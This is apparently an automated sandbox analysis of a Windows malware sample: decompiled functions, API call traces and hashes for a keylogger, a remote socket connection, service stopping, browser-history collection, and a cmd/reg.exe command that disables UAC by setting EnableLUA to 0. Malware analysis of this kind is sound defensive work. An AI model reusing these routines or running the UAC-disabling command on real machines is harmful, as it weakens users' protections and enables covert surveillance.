                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 00401AD5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00401AF2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000009C), ref: 00401B12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B1B
                                          • Part of subcall function 00401B26: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401B3E
                                          • Part of subcall function 00401B26: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00401B4B
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B5D
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401B75
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401B80
                                          • Part of subcall function 00401B26: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /sort "Visit Time" /stext ",?,?,00415628,00000000), ref: 00401B9C
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 00401BAE
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401BBB
                                          • Part of subcall function 00401B26: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00401BC8
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00401BD2
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BE3
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BEC
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BF5
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00401BFE
                                          • Part of subcall function 00401B26: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00401C0D
                                          • Part of subcall function 00401B26: Sleep.KERNEL32(000000FA), ref: 00401C24
                                          • Part of subcall function 00401B26: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000009D), ref: 00401C35
                                          • Part of subcall function 00401B26: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401C3E
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??1?$basic_string@$G@std@@$G@2@@std@@$??0?$basic_string@$?c_str@?$basic_string@V01@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$??4?$basic_string@?substr@?$basic_string@D@1@@V01@$?find@?$basic_string@FileG@1@@ModuleNameSleepV10@V10@0@V10@@
                                        • String ID:
                                        • API String ID: 573486607-0
                                        • Opcode ID: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction ID: 745551a8169cf10c7f688d11d93f95233c425957d6d772b9d422287574ec9151
                                        • Opcode Fuzzy Hash: 0444dc97c48bc4e2f82eff9e350e899fd224b97dfb04b76e2a9bcbee0c6a45e8
                                        • Instruction Fuzzy Hash: 2D11A23160060DDBCB04FBA5DD5AAEE3778EB48304F008439F912A72E1EF785544CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E00411859(void* _a4) {
                                        				struct _SERVICE_STATUS _v32;
                                        				short* _t6;
                                        				signed int _t14;
                                        				void* _t17;
                                        				void* _t18;
                                        
                                        				_t14 = 0;
                                        				_t6 = OpenSCManagerW(0, 0, 0x40);
                                        				_t18 = _t6;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                        				if(_t17 != 0) {
                                        					_t14 = 0 | ControlService(_t17, 2,  &_v32) != 0x00000000;
                                        					CloseServiceHandle(_t18);
                                        					CloseServiceHandle(_t17);
                                        				} else {
                                        					CloseServiceHandle(_t18);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t14;
                                        			}









                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,Function_0001B310,?,?,?,?,?,?,?,004111F9), ref: 00411868
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,004111F9), ref: 00411875
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,004111F9), ref: 0041187D
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 0041188A
                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,004111F9), ref: 00411899
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AB
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,004111F9), ref: 004118AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004111F9), ref: 004118B3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction ID: 456a524f7c11b696f934a25de41654fa22df35ab19f263cd8204020f404e56b2
                                        • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                        • Instruction Fuzzy Hash: 39F04471510518EFD3107FB4AC89EFF3F6CDF89790B448025FA0692150D7749D468AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 68%
                                        			E004118C0(void* _a4) {
                                        				struct _SERVICE_STATUS _v32;
                                        				short* _t6;
                                        				signed int _t14;
                                        				void* _t17;
                                        				void* _t18;
                                        
                                        				_t14 = 0;
                                        				_t6 = OpenSCManagerW(0, 0, 0x40);
                                        				_t18 = _t6;
                                        				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                        				_t17 = OpenServiceW(_t18, _t6, 0x40);
                                        				if(_t17 != 0) {
                                        					_t14 = 0 | ControlService(_t17, 3,  &_v32) != 0x00000000;
                                        					CloseServiceHandle(_t18);
                                        					CloseServiceHandle(_t17);
                                        				} else {
                                        					CloseServiceHandle(_t18);
                                        				}
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _t14;
                                        			}









                                        APIs
                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,Function_0001B310,?,?,?,?,?,?,?,00411168), ref: 004118CF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000040,?,?,?,?,?,?,?,00411168), ref: 004118DC
                                        • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00411168), ref: 004118E4
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 004118F1
                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,00411168), ref: 00411900
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411912
                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,00411168), ref: 00411915
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00411168), ref: 0041191A
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ControlManager
                                        • String ID:
                                        • API String ID: 858787766-0
                                        • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction ID: 16193dc10f2cd34b32417e23f1564050492aa2af447f1f1bdc9e6cf5e8b33254
                                        • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                        • Instruction Fuzzy Hash: D7F04471510518EFD7106FB4EC88DEF3F6CDF89750B444025FA0692150DB749E458AE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 24%
                                        			E00410E53(void* __eflags, char _a4) {
                                        				char _v20;
                                        				char _v36;
                                        				char _v52;
                                        				void* _t16;
                                        				char* _t18;
                                        				void* _t19;
                                        				void* _t36;
                                        
                                        				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
                                        				E00402038(0x41c130);
                                        				asm("movsd");
                                        				asm("movsd");
                                        				asm("movsd");
                                        				asm("movsd");
                                        				E0040209B(0x41c130,  &_a4);
                                        				_t16 = E00412855(0x41c130,  &_v36, E004113C9( &_v52));
                                        				_t18 =  &_v20;
                                        				L00414140();
                                        				L00414140();
                                        				_t19 = E004020C2(0x41c130, 0x34, _t36 - 0x10);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t18, _t18,  &_a4,  &E0041B310, _t16, 0x41c130);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				E00402118(0x41c130, E00410F04);
                                        				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        				return _t19;
                                        			}











                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00410E65
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                          • Part of subcall function 004113C9: OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                          • Part of subcall function 004113C9: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,Function_0001B310,00000000,?,?,00000000,?), ref: 00410EB0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,?), ref: 00410EBA
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000034,?,?,?,?,00000000,?), ref: 00410ED0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410ED9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EE2
                                          • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,?), ref: 00410EF7
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$??0?$basic_string@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CreateD@1@@G@1@@ManagerOpenThreadV01@connectsocket
                                        • String ID:
                                        • API String ID: 2339118965-0
                                        • Opcode ID: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction ID: 1193976e1187dff15876f75262123416920ecc17f0a83cfc990a5670802f72a4
                                        • Opcode Fuzzy Hash: 77364c1b16f72e8442b5cf229b6c9932876b50d99ed1b33d7c1a183c2fff5cdd
                                        • Instruction Fuzzy Hash: 1811A772A0021CA7CB00FBA1EC4ACEF776CEA84344704443EFE02E7191DA785948C7E8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 43%
                                        			E00412881(void* __eax, intOrPtr _a4, void* _a8, char _a11) {
                                        				char _v20;
                                        				void* _t15;
                                        				void* _t18;
                                        				signed int _t20;
                                        				void* _t25;
                                        				signed int _t28;
                                        				signed int _t29;
                                        				signed int _t36;
                                        				void* _t46;
                                        				signed int _t57;
                                        				void* _t58;
                                        
                                        				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                        				_t57 = __eax + 2;
                                        				_t15 = _t57 + _t57;
                                        				L00413E84();
                                        				_t25 = _t15;
                                        				_t28 = _t57;
                                        				_t46 = _t25;
                                        				_t29 = _t28 >> 2;
                                        				_t18 = memset(_t46 + _t29, memset(_t46, 0, _t29 << 2), (_t28 & 0x00000003) << 0);
                                        				_t6 = _t57 - 2; // 0x0
                                        				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t15);
                                        				_t58 = _t18;
                                        				_t36 = _t6 >> 2;
                                        				_t20 = memcpy(_t25, _t58, _t36 << 2);
                                        				memcpy(_t58 + _t36 + _t36, _t58, _t20 & 0x00000003);
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t25,  &_a11);
                                        				L00413EBE();
                                        				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z( &_v20, _t25);
                                        				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                        				return _a4;
                                        			}















                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                        • ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?c_str@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                        • String ID:
                                        • API String ID: 391609400-0
                                        • Opcode ID: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction ID: aeeabeca61c13fa181a61ba6e56d16b1543aaa328dd705508f0d2aa2ccd85a4a
                                        • Opcode Fuzzy Hash: c177d2df2063bbdc2060a0222ce48b64abd3706d1ceb561fbd7f54770638c6aa
                                        • Instruction Fuzzy Hash: A50180326005199B8B08EF68EC958EFB7EAFB88255744443EF907C7390DE709A05CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D76
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,0041BCB0,?,?,004054E4), ref: 00405D8D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 00405DA1
                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00405DC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventHookLocalTimeUnhookV01@@V10@V10@@Windowsfreemallocsprintf
                                        • String ID: Offline Keylogger Stopped$[INFO]
                                        • API String ID: 2222684746-1731565019
                                        • Opcode ID: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction ID: e64c4fb295ac971b427419d3758f0b97408fd66a05d8179c7aec1af0dcca75a5
                                        • Opcode Fuzzy Hash: 73c64669d0e90f52680bcd42a3afb3a3acb1e5eb000d97594ebbd2d1d962b6da
                                        • Instruction Fuzzy Hash: 0C01D674910B046BE7107725C84D7FB7EBCDF81750F44846BE842922C1D7B869458FAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 50%
                                        			E0040A0E1() {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				struct _STARTUPINFOA _v88;
                                        				signed int _t17;
                                        
                                        				_t17 = 0x11;
                                        				memset( &_v88, 0, _t17 << 2);
                                        				_v88.cb = 0x44;
                                        				asm("stosd");
                                        				asm("stosd");
                                        				asm("stosd");
                                        				asm("stosd");
                                        				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                        				CloseHandle(_v20);
                                        				return CloseHandle(_v20.hThread);
                                        			}
                                        APIs
                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                        • CloseHandle.KERNEL32(?), ref: 0040A12E
                                        • CloseHandle.KERNEL32(?), ref: 0040A133
                                        Strings
                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                        • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                        • D, xrefs: 0040A0F6
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandle$CreateProcess
                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                        • API String ID: 2922976086-1747066916
                                        • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                        • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                        • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 58%
                                        			E00412DDF(void _a4, void* _a8) {
                                        				struct _OVERLAPPED* _t13;
                                        				void* _t16;
                                        				long _t17;
                                        				void* _t19;
                                        
                                        				_t13 = 0;
                                        				_t19 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                        				if(_t19 != 0xffffffff) {
                                        					_t17 = GetFileSize(_t19, 0);
                                        					__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXID@Z(_t17, 0, _t16);
                                        					_t8 =  &_a4;
                                        					_a4 = 0;
                                        					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                        					if(ReadFile(_t19,  &_a4, _t17, _t8, 0) != 0) {
                                        						_t13 = 1;
                                        					}
                                        					CloseHandle(_t19);
                                        					return _t13;
                                        				}
                                        				return 0;
                                        			}
                                        APIs
